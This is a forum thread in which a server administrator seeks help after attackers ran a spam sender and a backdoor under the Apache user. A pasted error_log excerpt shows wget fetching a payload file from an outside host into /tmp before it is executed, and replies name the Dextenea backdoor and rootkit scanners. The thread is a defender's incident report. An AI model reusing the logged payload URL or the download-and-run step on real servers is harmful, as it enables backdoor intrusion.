Apache security problems

I

ircman

Verified User
Joined
Feb 5, 2004
Messages
115
Location
The Hague, Netherlands
We found some strange scripts running under the apache user.
1 was a ftp server and 1 was a spamsender.
So there is a problem somewhere in my apache that scripts can be executed under the apache user.

But i have no idea where to look or how to fix this.

Can someone help me with this ?

Kind regards,
 
ircman said:
We found some strange scripts running under the apache user.
1 was a ftp server and 1 was a spamsender.
So there is a problem somewhere in my apache that scripts can be executed under the apache user.

But i have no idea where to look or how to fix this.

Can someone help me with this ?

Kind regards,
Click to expand...

If it runs as the user apache, then there's probably a php script that has an exploit.
 
hmm.. I have searched all the log files but I cannot detect anything.
They uploaded some scripts and they could execute it as the apache user.
What is the best possible way to secure this asap ?.
 
The only thing we found was in our /var/log/httpd/error_log:


--12:46:38-- http://www.move2wigan.com/images/img/tt.txt
=> `tt.txt'
Resolving www.move2wigan.com... 217.199.184.98
Connecting to www.move2wigan.com[217.199.184.98]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,448 [text/plain]

0K .......... ........ 100% 288.57 KB/s

12:46:39 (288.57 KB/s) - `tt.txt' saved [19448/19448]


After this the file tt.txt was in the folder /tmp and somehow it was executed. With this program somebody was able do connect with ssh as user apache with this program.

Does somebody know how he could download en execute this file ?
 
De file is a backdoor virus, called dextenea....


From the symantec site:

Backdoor.Dextenea is a Linux-based Trojan horse that attempts to open a back door and uses various malicious programs to conceal its presence.


Do you have chkrootkit or rkhunter installed ?
 
We installed rkhunter and it showed no installed rootkits. We updated openssl and php because there was a newer version, but after that it happend again.

i'll try chkrootkit now to see if that prog can find something.
 
You must log in or register to reply here.
Back
Top